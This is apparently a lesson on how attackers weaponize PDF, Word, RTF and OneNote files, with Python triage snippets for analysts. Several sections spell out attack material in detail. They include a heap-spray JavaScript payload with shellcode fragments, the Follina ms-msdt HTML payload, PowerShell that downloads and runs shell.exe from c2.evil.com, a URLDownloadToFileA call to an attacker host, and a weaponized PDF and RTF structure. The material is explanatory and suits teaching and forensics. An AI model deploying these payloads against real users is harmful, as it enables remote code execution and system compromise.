How attackers use it: After Microsoft blocked VBA macros from internet documents (2022), threat actors switched to OneNote as their primary delivery format. The attacker embeds a .bat, .vbs, .hta, or .wsf script inside a .one file, layered behind a graphic that says "Double-click to view document." When clicked, the embedded script executes. Qakbot, AsyncRAT, and IcedID campaigns all adopted this technique in Q1 2023.

Example generation: The .one file contains an embedded payload.bat that runs powershell -e [base64], hidden behind a "Click here to view" image overlay that covers the entire page.

Document Exploit: Anatomy — The Full Attack Flow

Every document exploit follows a similar pattern: delivery → trigger → execution → post-exploitation. Here is a detailed breakdown showing exactly what happens at each stage, including what code or data is involved and what the system sees:

anatomy-of-doc-exploit.pseudo — complete attack flow

// Complete anatomy of a document exploit chain
// This shows EXACTLY what happens at each stage

STAGE 1: DELIVERY
  → Attacker crafts a phishing email:
     From: accounting@acme-corp.net (spoofed domain)
     Subject: "Invoice #2024-0342 — Payment Overdue"
     Attachment: Invoice_March_2024.pdf (6.8 KB)
  → The PDF looks like a legitimate invoice when opened
  → The recipient is in Accounts Payable — they open invoices daily
  → The file passes the email gateway's antivirus scan
     (because the payload is compressed/obfuscated inside a stream)

STAGE 2: TRIGGER — What Happens When the File Opens
  → The user double-clicks the PDF attachment
  → Adobe Reader (or the system PDF viewer) launches
  → The reader parses the PDF's object structure:
     Object 1: Catalog → finds /OpenAction → follows reference
     Object 7: Action → type is /JavaScript → loads JS engine
     Object 9: Stream → FlateDecode decompresses 4,821 bytes
  → The decompressed JavaScript begins executing immediately
  → The user sees the invoice on screen — nothing looks wrong

STAGE 3: EXPLOITATION — The JavaScript Payload Executes
  → The JavaScript performs three operations:
     1. DECODE: Converts hex-encoded shellcode to binary
        var sc = unescape("%ue8fc%u8200%u0000%u6089...");
     2. HEAP SPRAY: Fills 200MB of memory with shellcode copies
        for(i=0; i<200; i++) spray[i] = nopsled + shellcode;
     3. TRIGGER: Calls a vulnerable Reader API function
        Collab.collectEmailInfo({subj: "A".repeat(0x4141)});
  → The API function has a buffer overflow vulnerability
  → The oversized string overflows the buffer, overwrites EIP
  → EIP now points to 0x0C0C0C0C (inside the sprayed heap)
  → CPU jumps to the NOP sled → slides into shellcode
  → The attacker now has code execution in the Reader process

STAGE 4: POST-EXPLOITATION — Full Compromise
  → Shellcode downloads second-stage payload:
     URLDownloadToFileA("http://c2.attacker.com/beacon.exe")
  → Beacon.exe is a Cobalt Strike implant that:
     • Establishes encrypted C2 channel to attacker's server
     • Uses kernel exploit for SYSTEM privilege escalation
     • Dumps credentials with Mimikatz
     • Moves laterally across the network via SMB/WMI
     • Discovers domain controller, becomes Domain Admin
  → Data exfiltration begins — or ransomware deploys
  → The entire chain: email → PDF → JavaScript → shellcode → beacon
     took less than 3 seconds from the moment the file was opened

Follina Deep Dive (CVE-2022-30190) — Complete Technical Breakdown

Follina was a game-changer because it achieved remote code execution without macros, without "Enable Content" prompts, and even from the Windows Explorer preview pane. Here is exactly how the exploit works, step by step, with every component explained:

follina-mechanism.txt — complete technical breakdown

// Follina Attack Flow (CVE-2022-30190) — Full Technical Detail

1. THE DOCUMENT STRUCTURE
   Attacker creates a .docx file (which is a ZIP archive containing XML).
   Inside the ZIP, they modify: word/_rels/document.xml.rels
   They add an external OLE object reference:

   <Relationship Id="rId1337"
     Type="http://schemas.openxmlformats.org/officeDocument/
           2006/relationships/oleObject"
     Target="https://attacker-server.com/payload.html"
     TargetMode="External" />

   The .docx itself contains NO malicious code — it just has a URL.

2. WORD FETCHES THE REMOTE PAYLOAD
   → User opens the .docx (or, for an RTF variant, merely selects it with the Explorer preview pane enabled)
   → Word parses document.xml.rels, finds the external relationship
   → Word makes an HTTP GET request to the attacker's server
   → The server responds with an HTML file:

3. THE HTML PAYLOAD (served by attacker)
   <!DOCTYPE html>
   <html><body>
   <script>
     window.location.href = "ms-msdt:/id PCWDiagnostic
       /skip force /param \"IT_RebrowseForFile=cal?c
       IT_LaunchMethod=ContextMenu
       IT_SelectProgram=NotListed
       IT_BrowseForFile=h]$(IEX('powershell -e JABjAGw...'))
       i]/../../../../../../../../../../../temp/doc.html\";";
   </script>
   </body></html>

4. MSDT EXECUTES THE PAYLOAD
   → The ms-msdt: URI launches Microsoft Support Diagnostic Tool
   → MSDT parses the /param arguments
   → The IT_BrowseForFile parameter contains a PowerShell command
     wrapped in $() — which MSDT executes as part of path expansion
   → PowerShell runs with the user's full privileges
   → The base64-encoded command (JABjAGw...) decodes to:
     $c=New-Object Net.WebClient;
     $c.DownloadFile('http://c2.evil.com/shell.exe','C:\Temp\s.exe');
     Start-Process 'C:\Temp\s.exe'

5. RESULT: FULL REMOTE CODE EXECUTION
   → No macro prompt — this isn't a macro attack
   → No "Enable Content" — there's no VBA code
   → Protected View was bypassed in RTF files (no sandbox at all)
   → Even the Explorer Preview Pane triggered the exploit
   → The user saw a normal document. The system was fully compromised.

// Impact: Affected all Windows versions with Office installed.
// Patched in June 2022. Exploited in the wild by APT groups
// including Chinese state-sponsored actors targeting US/EU.

🔍 Why Follina Was So Impactful: Key Points
1. It bypassed every traditional Office security control: macro blocking, Protected View (in RTF mode), and AMSI (Antimalware Scan Interface), because the payload was executed by MSDT, not by Office.
2. It worked in .docx, .rtf, and .pptx files. RTF files were especially dangerous because they could trigger the exploit from the Windows Explorer preview pane — no double-click needed.
3. The initial .docx file contained zero malicious code — just a URL. This meant email scanners and antivirus software rated the file as clean. The actual payload was on the attacker's server and could be changed at any time.
4. Until the patch shipped in June 2022, the recommended workaround was to disable the ms-msdt: protocol handler entirely via the registry (after backing up the key): reg delete HKCR\ms-msdt /f

// 06 — PDF Exploit Internals ⏱ 15 min · Advanced

Inside a PDF Exploit

PDF files aren't just static pages — the PDF specification (ISO 32000, over 1,000 pages) supports embedded JavaScript, form actions, URI handlers, launch actions, complex stream objects, and encrypted content. Adobe Reader includes a full JavaScript engine (based on SpiderMonkey) that can execute code embedded inside PDF objects. Attackers weaponize these features to run arbitrary code the instant a PDF is opened.

A PDF file is structured as a collection of numbered objects. Each object has a type and properties defined by key-value pairs. Objects can reference other objects by number. The root of the document is the Catalog (Object 1 in the examples here; in general the trailer's /Root entry identifies it), which points to the page tree, which points to individual pages, which point to content streams containing the actual text and graphics. Hidden among these legitimate objects, an attacker adds JavaScript Action objects and compressed payload streams that execute automatically on open.

Below, we show two complete PDF files opened in a text editor — every single line of their internal structure is visible. The first is a clean, legitimate invoice. The second is the same invoice after an attacker has weaponized it by injecting three additional objects and modifying one line of the Catalog. Understanding the difference between these two files is the core of PDF forensics.
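A first-pass forensic check is simply to count the names that make a PDF active. The sketch below searches the raw bytes for a handful of such names; the list and the function name `count_pdf_names` are choices made for this example. It is a coarse triage aid only: it does not look inside compressed object streams, and it misses names obfuscated with #xx hex escapes, both of which dedicated PDF analysis tools handle.

```python
import re

SUSPICIOUS_NAMES = (b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch", b"/EmbeddedFile")


def count_pdf_names(data: bytes) -> dict[str, int]:
    """Count occurrences of action-related PDF names in raw file bytes."""
    counts = {}
    for name in SUSPICIOUS_NAMES:
        # The lookahead stops /JS from matching a longer name such as /JSFoo.
        pattern = re.escape(name) + rb"(?![A-Za-z0-9])"
        counts[name.decode("ascii")] = len(re.findall(pattern, data))
    return counts


clean = b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
modified = (
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 7 0 R >>\nendobj\n"
    b"7 0 obj\n<< /Type /Action /S /JavaScript /JS 9 0 R >>\nendobj\n"
)
print(count_pdf_names(clean))
print(count_pdf_names(modified))
```

A clean invoice normally scores zero on every name, so any non-zero count for /OpenAction together with /JavaScript or /JS is a reason to inspect the referenced objects by hand.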

🔬 What You'll See Below

Two side-by-side "Notepad views" showing the raw internal structure of a PDF file. The clean version has 6 objects: a Catalog (root), a page tree, a page definition, a content stream (the visible invoice text), and two font definitions. The exploited version has all 6 of those same objects plus 3 injected objects: an Action trigger, a backup Action, and a compressed JavaScript payload stream. Every line is annotated with explanations. Red-highlighted lines in the exploited version show exactly what the attacker added or changed.

Clean vs. Exploited — Raw "Notepad" View

If you open a simple PDF in Notepad (or a hex editor), you will see its raw internal structure. A PDF is a sequence of numbered objects written largely as text, with binary data confined to stream bodies (compressed content, fonts, images). Below are two complete PDFs: a legitimate invoice, and the same invoice after an attacker has weaponized it. Every line is shown, apart from the middle of the compressed payload stream, which is abbreviated.

📄 Invoice_March_2024.pdf (2.1 KB) Clean

───── PDF HEADER ─────
%PDF-1.7
    ↑ Magic bytes: identifies this as a PDF version 1.7 file.
    ↑ Every PDF reader checks this first line.
%âãÏÓ
    ↑ Binary comment: tells text editors this file has binary content.

───── OBJECT 1: CATALOG (the root) ─────
1 0 obj
    ↑ Object number 1, revision 0. This is the document catalog.
<<
  /Type /Catalog
    ↑ Declares this object as the root catalog of the PDF.
  /Pages 2 0 R
    ↑ Points to Object 2 which holds the page tree.
    ↑ "2 0 R" means: reference to object #2, revision 0.
>>
endobj

───── OBJECT 2: PAGE TREE ─────
2 0 obj
<<
  /Type /Pages
    ↑ Container for all pages in the document.
  /Kids [3 0 R]
    ↑ Array of child pages. This PDF has one page (Object 3).
  /Count 1
    ↑ Total number of pages in the document.
>>
endobj

───── OBJECT 3: THE PAGE ─────
3 0 obj
<<
  /Type /Page
  /Parent 2 0 R
    ↑ Back-reference to parent page tree (Object 2).
  /MediaBox [0 0 612 792]
    ↑ Page dimensions in points. 612×792 = US Letter (8.5" × 11").
  /Contents 4 0 R
    ↑ The actual visible content is in Object 4.
  /Resources <<
    /Font <<
      /F1 5 0 R
    ↑ Font F1 is defined in Object 5 (Helvetica).
      /F2 6 0 R
    ↑ Font F2 is defined in Object 6 (Helvetica-Bold).
    >>
  >>
>>
endobj

───── OBJECT 4: PAGE CONTENT STREAM ─────
4 0 obj
<< /Length 412 >>
    ↑ Stream is 412 bytes of PDF drawing commands.
stream
    ↑ Everything between stream/endstream is the page content.
BT
    ↑ BT = Begin Text block.
/F2 22 Tf
    ↑ Select font F2 (Helvetica-Bold) at 22pt size.
72 740 Td
    ↑ Move text cursor to position (72, 740), the top-left area.
(INVOICE) Tj
    ↑ Tj = Show text string "INVOICE".
/F1 11 Tf
    ↑ Switch to font F1 (Helvetica) at 11pt.
0 -24 Td (Invoice #2024-0342) Tj
0 -16 Td (Date: March 15, 2024) Tj
0 -16 Td (Bill To: Acme Corporation) Tj
0 -16 Td (Attn: Jane Doe, Accounts Payable) Tj
0 -32 Td /F2 11 Tf (Description Qty Rate Amount) Tj
/F1 10 Tf
0 -18 Td (Consulting Services 40 $85.00 $3,400.00) Tj
0 -14 Td (Software License 1 $650.00 $650.00) Tj
0 -14 Td (Support Package 1 $200.00 $200.00) Tj
0 -24 Td /F2 11 Tf (TOTAL DUE: $4,250.00) Tj
0 -32 Td /F1 9 Tf (Payment Terms: Net 30) Tj
0 -14 Td (Please remit to: Acme Corp, PO Box 1234) Tj
ET
    ↑ ET = End Text block. All visible content ends here.
endstream
endobj

───── OBJECT 5: FONT DEFINITION ─────
5 0 obj
<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica >>
endobj

───── OBJECT 6: BOLD FONT ─────
6 0 obj
<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica-Bold >>
endobj

───── CROSS-REFERENCE TABLE ─────
xref
    ↑ Byte-offset index: tells the reader where each object starts.
0 7
    ↑ 7 entries (objects 0–6).
0000000000 65535 f
0000000015 00000 n
0000000089 00000 n
0000000164 00000 n
0000000398 00000 n
0000000862 00000 n
0000000939 00000 n

───── TRAILER ─────
trailer
<<
  /Size 7
    ↑ Total number of objects in the xref table.
  /Root 1 0 R
    ↑ Points to the Catalog (Object 1) as the document root.
>>
startxref
1022
    ↑ Byte offset where the xref table starts in this file.
%%EOF
    ↑ End of file marker. Nothing after this in a clean PDF.

6 objects | 0 actions | 0 scripts SAFE ✓

💀 Invoice_March_2024.pdf (6.8 KB) Exploited

───── PDF HEADER (identical to clean) ─────
%PDF-1.7
%âãÏÓ

───── OBJECT 1: CATALOG (⚠ MODIFIED) ─────
1 0 obj
<<
  /Type /Catalog
  /Pages 2 0 R
  /OpenAction 7 0 R
    ⚠ INJECTED! This line does NOT exist in the clean PDF.
    ⚠ /OpenAction tells the reader: "when this PDF opens,
    ⚠ automatically execute the action in Object 7."
    ⚠ The user is never asked for permission.
>>
endobj

───── OBJECTS 2–6: IDENTICAL TO CLEAN PDF ─────
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R /Resources << /Font << /F1 5 0 R /F2 6 0 R >> >> >>
endobj
4 0 obj
<< /Length 412 >>
stream
BT
/F2 22 Tf
72 740 Td
(INVOICE) Tj
/F1 11 Tf
0 -24 Td (Invoice #2024-0342) Tj
0 -16 Td (Date: March 15, 2024) Tj
0 -16 Td (Bill To: Acme Corporation) Tj
0 -16 Td (Attn: Jane Doe, Accounts Payable) Tj
0 -32 Td /F2 11 Tf (Description Qty Rate Amount) Tj
/F1 10 Tf
0 -18 Td (Consulting Services 40 $85.00 $3,400.00) Tj
0 -14 Td (Software License 1 $650.00 $650.00) Tj
0 -14 Td (Support Package 1 $200.00 $200.00) Tj
0 -24 Td /F2 11 Tf (TOTAL DUE: $4,250.00) Tj
0 -32 Td /F1 9 Tf (Payment Terms: Net 30) Tj
0 -14 Td (Please remit to: Acme Corp, PO Box 1234) Tj
ET
endstream
endobj
    ↑ Page content is 100% identical to clean, so the invoice looks normal.
5 0 obj
<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica >>
endobj
6 0 obj
<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica-Bold >>
endobj

═══════════════════════════════════════════════
⚠ EVERYTHING BELOW THIS POINT IS NEW,
⚠ INJECTED BY THE ATTACKER. The clean PDF
⚠ ends at Object 6. Objects 7, 8, 9 are
⚠ the attacker's malicious additions.
═══════════════════════════════════════════════

───── OBJECT 7: AUTO-OPEN TRIGGER ─────
7 0 obj
<<
  /Type /Action
    ⚠ This is an Action object: it DOES something when invoked.
  /S /JavaScript
    ⚠ /S /JavaScript = the action type is "execute JavaScript".
    ⚠ Adobe Reader has a built-in JavaScript engine.
  /JS 9 0 R
    ⚠ The actual JavaScript code is in Object 9 (a stream).
>>
endobj

───── OBJECT 8: SECONDARY ACTION (chained trigger) ─────
8 0 obj
<<
  /Type /Action
  /S /JavaScript
  /JS 9 0 R
  /Next 7 0 R
    ⚠ /Next names the action to run AFTER this one (Object 7).
    ⚠ It is a sequence, not a fallback. Nothing in this file
    ⚠ references Object 8, so it never fires on its own.
>>
endobj

───── OBJECT 9: THE PAYLOAD (compressed JavaScript) ─────
9 0 obj
<<
  /Length 4821
    ⚠ 4,821 bytes: WAY larger than any normal PDF object.
    ⚠ A clean PDF font object is ~60 bytes. This is suspicious.
  /Filter /FlateDecode
    ⚠ /FlateDecode = zlib compression. The bytes below are
    ⚠ compressed. When Reader opens this object, it decompresses
    ⚠ them to reveal ~11,200 bytes of raw JavaScript code.
    ⚠ This compression HIDES the payload from simple text search.
>>
stream
78 9C 4D 52 CB 6E DB 30
    ⚠ 78 9C = zlib magic header (confirms FlateDecode).
10 BC F7 2B 76 49 0F 49 C5 A4 F8 10 29 41 81 A2
40 DB 97 FC 8E 3C 0A 17 E8 82 00 00 00 60 89 E5
31 C0 64 8B 50 30 8B 52 0C 8B 52 14 8B 72 28 0F
B7 4A 26 31 FF AC 3C 61 7C 02 2C 20 C1 CF 0D 01
C7 E2 F2 52 57 8B 52 10 8B 4A 3C 8B 4C 11 78 E3
48 01 D1 51 8B 59 20 01 D3 8B 49 18 E3 3A 49 8B
34 8B 01 D6 31 FF AC C1
    ⚠ These compressed bytes, when decoded, become:
    ⚠ • Shellcode encoded as unescape("%ue8fc%u8200...")
    ⚠ • A heap spray loop filling 200MB with NOP sleds
    ⚠ • A call to Collab.collectEmailInfo() to trigger overflow
CF 0D 01 C7 38 E0 75 F6 03 7D F8 3B 7D 24 75 E4
58 8B 58 24 01 D3 66 8B 0C 4B 8B 58 1C 01 D3 8B
    ⚠ ... 4,700+ more bytes of compressed exploit code ...
04 8B 01 D0 89 44 24 24 5B 5B 61 59 5A 51 FF E0
5F 5F 5A 8B 12 EB 8D 5D
endstream
endobj

───── MODIFIED CROSS-REFERENCE TABLE ─────
xref
0 10
    ⚠ Changed from "0 7" to "0 10": the table now has 10 entries
    ⚠ instead of 7 (added objects 7, 8, 9).
0000000000 65535 f
0000000015 00000 n
0000000089 00000 n
0000000164 00000 n
0000000398 00000 n
0000000862 00000 n
0000000939 00000 n
0000001022 00000 n
0000001118 00000 n
0000001230 00000 n
    ⚠ Three new entries added pointing to objects 7, 8, 9.

───── MODIFIED TRAILER ─────
trailer
<<
  /Size 10
    ⚠ Changed from 7 to 10 to account for 3 new objects.
  /Root 1 0 R
>>
startxref
6104
    ⚠ Changed from 1022: the xref table is now at a different
    ⚠ byte offset because extra objects pushed it further back.
%%EOF

9 objects | 2 actions | 1 JS stream ⚠ MALICIOUS
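From the analyst's side, the /FlateDecode annotation on Object 9 is something you can check by hand. The sketch below is a simplified stand-in for what tools like pdf-parser.py do: it finds stream objects with a regular expression and inflates the ones whose dictionary mentions /FlateDecode. The function name `inflate_streams` and the benign sample object are assumptions made for illustration; a real parser honours /Length, filter chains, and object streams, which this does not.

```python
import re
import zlib

# "<num> <gen> obj <dict> stream <data> endstream", never crossing an endobj.
# Simplification: /Length is ignored and only a single filter is handled.
STREAM_RE = re.compile(
    rb"(\d+)\s+\d+\s+obj((?:(?!endobj).)*?)stream\r?\n(.*?)endstream",
    re.DOTALL,
)

def inflate_streams(pdf_bytes):
    """Return {object number: decompressed bytes} for FlateDecode streams."""
    results = {}
    for match in STREAM_RE.finditer(pdf_bytes):
        obj_num = int(match.group(1))
        dictionary, data = match.group(2), match.group(3)
        if b"/FlateDecode" not in dictionary:
            continue
        try:
            # decompressobj tolerates the newline left before "endstream"
            results[obj_num] = zlib.decompressobj().decompress(data)
        except zlib.error:
            continue  # malformed stream: skip it in this sketch
    return results

# Harmless demo: one plain stream and one compressed stream holding a benign script.
script = b"app.alert('hello');"
packed = zlib.compress(script)
sample = (
    b"4 0 obj\n<< /Length 5 >>\nstream\nBT ET\nendstream\nendobj\n"
    b"9 0 obj\n<< /Length " + str(len(packed)).encode() +
    b" /Filter /FlateDecode >>\nstream\n" + packed + b"\nendstream\nendobj\n"
)
print(inflate_streams(sample))
```

Only object 9 appears in the result, because object 4 has no filter. Anything recovered this way should be treated as untrusted text to read, never something to execute.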

👁️ What Changed — Summary The attacker made exactly 4 modifications to the clean PDF:
1. Added /OpenAction 7 0 R to Object 1 (the Catalog) — this is the auto-execute trigger.
2. Added Object 7 — a JavaScript action that references the payload stream.
3. Added Object 8: a second JavaScript action chained to Object 7 via /Next. Nothing in the file references Object 8, so it never fires on its own.
4. Added Object 9 — 4,821 bytes of FlateDecode-compressed JavaScript containing shellcode + heap spray + vulnerability trigger.
The xref table and trailer were updated to reflect the new objects. The visible invoice content is completely unchanged — the user sees nothing different when they open the file.
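The four modifications above are exactly what a first-pass triage looks for. As a rough sketch (similar in spirit to keyword counters such as pdfid, but not a reimplementation of any tool), the code below counts a handful of risky PDF names in the raw bytes. The key list and the `triage` function are illustrative assumptions, and the approach is easily defeated by name obfuscation (for example hex escapes like /J#53) or by hiding objects inside compressed object streams.

```python
import re

# Names that deserve a closer look; an illustrative list, not an exhaustive one.
SUSPICIOUS_KEYS = [b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch", b"/EmbeddedFile"]

def triage(pdf_bytes):
    """Count suspicious names and object definitions in raw PDF bytes."""
    counts = {}
    for key in SUSPICIOUS_KEYS:
        # The lookahead stops /JS from matching inside a longer name.
        pattern = re.escape(key) + rb"(?![A-Za-z0-9])"
        counts[key.decode()] = len(re.findall(pattern, pdf_bytes))
    counts["objects"] = len(re.findall(rb"\b\d+\s+\d+\s+obj\b", pdf_bytes))
    return counts

clean = b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
weaponized = (
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 7 0 R >>\nendobj\n"
    b"7 0 obj\n<< /Type /Action /S /JavaScript /JS 9 0 R >>\nendobj\n"
)
print(triage(clean))
print(triage(weaponized))
```

A non-zero /OpenAction count combined with /JS or /JavaScript is not proof of malice (legitimate forms use both), but it is the cue to decompress and read the referenced stream.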

How Each Exploit Type Works Internally

Different document formats are exploited in fundamentally different ways. The subsections below cover each technique in turn:

PDF JavaScript Execution

The PDF specification (ISO 32000) officially supports JavaScript. Adobe Reader includes a full SpiderMonkey JS engine (the same engine Firefox uses). This means a PDF file can contain complete JavaScript programs that execute automatically. Attackers abuse this to:

Run code automatically when the PDF opens (/OpenAction) — no user interaction required
Trigger on page open (/AA /O), form-field keystrokes (/AA /K), print events (/AA /WP), or document close (/AA /WC)
Access Reader's internal APIs like Collab.collectEmailInfo(), util.printf(), spell.customDictionaryOpen() — many of which have had buffer overflow vulnerabilities
Build heap sprays using JavaScript's string manipulation (create strings of NOP sled bytes, replicate them across ~200MB of heap memory)
Fingerprint the Reader version using app.viewerVersion and serve version-specific exploits

Here's what the decoded JavaScript inside a malicious PDF looks like. It is extracted from Object 9's compressed stream by running it through a FlateDecode decompressor (tools such as pdf-parser.py do this with the -o 9 -f options):

decoded_payload.js (extracted from obj 9, after FlateDecode)

// DECODED from the FlateDecode stream — this is what runs
// when the PDF opens in a vulnerable Adobe Reader

var shellcode = unescape(
  "%u4141%u4141%u4242%u4242" + // filler bytes 0x41/0x42 (not true NOPs), %u-encoded
  "%ue8fc%u0082%u0000%u8960" + // Shellcode start
  "%ue531%u64f0%u508b%u8b30" + // PEB walk to find kernel32
  "%u0c52%u528b%u8b14%u2872" + // Locate LoadLibraryA
  "%u18b1%u50ff%u3368%u6832" + // Resolve API addresses
  // ... hundreds more bytes ...
);

// HEAP SPRAY — fill memory with shellcode copies
var spray = new Array();
var chunk = "";

// Build a 1MB block: NOP sled + shellcode
var nopsled = unescape("%u0c0c%u0c0c");
while (nopsled.length < 0x100000) {
  nopsled += nopsled;
}
chunk = nopsled.substring(0, 0x100000 - shellcode.length);

// Spray 200 copies across the heap (~200 MB)
for (var i = 0; i < 200; i++) {
  spray[i] = chunk + shellcode;
}

// TRIGGER — exploit vulnerability in Collab.collectEmailInfo()
// Buffer overflow overwrites saved EIP → lands in NOP sled
Collab.collectEmailInfo({subj: "A".repeat(0x4141)});

⚠ What Just Happened The JavaScript: (1) decoded shellcode from hex/unicode, (2) sprayed 200MB of NOP-sled + shellcode across the heap, (3) triggered a buffer overflow in a Reader API. The overflow redirects execution into the sprayed memory → lands on a NOP sled → slides into shellcode → full code execution.
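When reading a decoded script like this, the first analysis step is usually to turn the %u escapes back into the bytes they occupy in memory. Each %uXXXX is one 16-bit value stored little-endian, so the two bytes appear swapped. The helper below is a minimal sketch of that conversion; the name `decode_percent_u` is made up for this example, and it deliberately ignores anything in the string that is not a %u escape.

```python
import re
import struct

def decode_percent_u(text):
    """Convert '%uXXXX' escapes to the little-endian bytes they represent."""
    out = bytearray()
    for word in re.findall(r"%u([0-9a-fA-F]{4})", text):
        out += struct.pack("<H", int(word, 16))  # low byte first
    return bytes(out)

print(decode_percent_u("%u0c0c%u0c0c").hex(" "))  # 0c 0c 0c 0c
print(decode_percent_u("%ue8fc%u0082").hex(" "))  # fc e8 82 00
```

The second line shows why "%ue8fc%u0082" in the script corresponds to the byte sequence FC E8 82 00 seen in hex dumps of the same payload.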

Heap Spraying — Filling Memory with Malice

Heap spraying is a memory manipulation technique that makes exploit reliability dramatically higher. The core problem for an attacker is: after the buffer overflow hijacks EIP, the CPU needs to jump somewhere — but the attacker doesn't know the exact address where their shellcode landed in memory. ASLR (Address Space Layout Randomization) makes heap addresses unpredictable.

The solution: Instead of needing to guess one exact address, the attacker fills hundreds of megabytes of heap memory with copies of the shellcode, each preceded by a huge NOP sled. Now any jump into that region (a ~200MB window) will land on either a NOP sled (which slides to the shellcode) or the shellcode itself. This turns a needle-in-a-haystack problem into a barn-door problem. The spray creates ~200 identical 1MB blocks, each containing ~1,048,232 bytes of NOP sled followed by ~344 bytes of shellcode.
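The block arithmetic in the paragraph above can be checked in a few lines. This is only a worked calculation using the figures quoted there (1 MB blocks, about 344 bytes of shellcode, 200 blocks); the variable names are illustrative.

```python
MIB = 1024 * 1024

BLOCK_BYTES = 1 * MIB      # size of one spray block, per the text
SHELLCODE_BYTES = 344      # approximate shellcode size quoted above
BLOCK_COUNT = 200

sled_bytes = BLOCK_BYTES - SHELLCODE_BYTES
landing_fraction = sled_bytes / BLOCK_BYTES
total_bytes = BLOCK_COUNT * BLOCK_BYTES

print(sled_bytes)                   # 1048232
print(f"{landing_fraction:.4%}")    # 99.9672%
print(total_bytes, total_bytes / MIB)
```

Almost the whole block is sled, which is why a jump to an arbitrary offset inside a block is overwhelmingly likely to land before the shellcode rather than in the middle of it.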

Before the Spray: Normal Memory Layout

0x00400000    AcroRd32.exe code
0x00800000    Heap (small, normal)
0x01000000    Free / unmapped
0x7FFE0000    Kernel32/NTDLL

After the Spray: Attacker Controls the Heap

0x00400000    AcroRd32.exe code
0x04040000    NOP sled (0x0c0c0c0c)
0x0c0c0c0c    Spray block #48 (target!)
0x0c0c0c0c+   ★ Shellcode lands here
0x0c100000    Spray blocks #49-200...
0x7FFE0000    Kernel32/NTDLL

🎯 Why 0x0c0c0c0c? Attackers use the value 0x0c0c0c0c because: (1) it's a predictable address in the heap region after spraying ~200MB, (2) 0x0C is the opcode for a benign instruction (OR AL, imm8) on x86 — so even if execution lands in the middle of the NOP sled, it slides harmlessly to the shellcode.
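The properties of 0x0C0C0C0C are easy to verify numerically. The short check below converts the address to decimal, expresses it in MiB, and confirms that its little-endian and big-endian encodings are identical. It is plain arithmetic with Python's standard library; nothing here is specific to any exploit.

```python
import struct

TARGET = 0x0C0C0C0C

print(TARGET)                     # 202116108
print(round(TARGET / 2**20, 2))   # 192.75 (MiB into the address space)

little = struct.pack("<I", TARGET)
big = struct.pack(">I", TARGET)
print(little == big)              # True: all four bytes are 0x0C

# For comparison, the round figure 0x0C000000 is exactly 192 MiB.
print(0x0C000000, 0x0C000000 // 2**20)   # 201326592 192
```

The exact decimal value of 0x0C0C0C0C is 202,116,108; the nearby figure 201,326,592 is 0x0C000000, which is the clean 192 MiB boundary.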

The hex dump below shows what a single spray block looks like in memory — the repeating NOP sled pattern followed by the actual shellcode:

0C0C0000  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
0C0C0010  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
0C0C0020  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
...       ◄ thousands of rows, all 0x0C (NOP sled) ►
0C0CFFF0  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
0C0D0000  FC E8 82 00 00 00 60 89 E5 31 C0 64 8B 50 30 8B  ......`.1.d.P0.
0C0D0010  52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF AC 3C  R..R..r(..J&1..<
0C0D0020  61 7C 02 2C 20 C1 CF 0D 01 C7 E2 F2 52 57 8B 52  a|., .......RW.R
0C0D0030  10 8B 4A 3C 8B 4C 11 78 E3 48 01 D1 51 8B 59 20  ..J<.L.x.H..Q.Y
...       ◄ shellcode continues: downloads & executes payload ►

RTF (Rich Text Format) Exploits

RTF files are text-based documents parsed by Microsoft Word. Unlike .docx (which is a ZIP of XML files), RTF uses control words (like {\rtf1\ansi}) that Word's parser interprets directly. RTF supports embedded OLE objects via the {\object\objemb} control — which means an attacker can embed a binary exploit payload inside what looks like a plain text document.

Why attackers love RTF: (1) Some RTF vulnerabilities can be triggered from a preview pane (in Outlook or Windows Explorer), so the exploit can fire when the file is merely selected, before the user opens it. (2) The binary payload is hex-encoded in the \objdata field, making it easy to generate with Python. (3) RTF doesn't trigger the Mark-of-the-Web check in some Office configurations. (4) Many email gateways don't inspect RTF as aggressively as .docx or .xlsx.

The example below shows an abridged malicious RTF. It displays a normal invoice while hiding an Equation Editor exploit (CVE-2017-11882) in the embedded OLE object. The hex digits in the \objdata field encode the binary content of the embedded object, including the exploit payload:

malicious_invoice.rtf — raw view

{\rtf1\ansi\deff0
{\fonttbl{\f0 Calibri;}}
\pard Invoice #2024-0342 — Acme Corp\par
\pard Total Due: $4,250.00\par

{\* This part looks normal to the reader}

{\object\objemb\objw1\objh1    ◄ EMBEDDED OLE OBJECT
{\*\objclass Equation.3}      ◄ Targets Equation Editor
{\*\objdata
01050000                       ◄ OLE header
02000000                       ◄ Format ID
0B0000004571756174696F6E    ◄ "Equation" in hex
2E33000000000000000000
0000000000
1C00000002000000E9FF        ◄ Overflow starts here
BF0000000000                 ◄ Overwrites return addr
41414141                       ◄ 0x41414141 = "AAAA"
FC E8 82 00 00 00 60 89    ◄ Shellcode begins
E5 31 C0 64 8B 50 30 8B    ◄ PEB walk...
... more shellcode bytes ...
}}
}

🔍 The RTF Trick The document displays a normal invoice. But hidden inside is an OLE object targeting the Equation Editor (CVE-2017-11882). The hex-encoded binary overflows a buffer in EQNEDT32.EXE, overwrites the return address, and redirects execution to embedded shellcode. Word renders the invoice — the user sees nothing wrong.
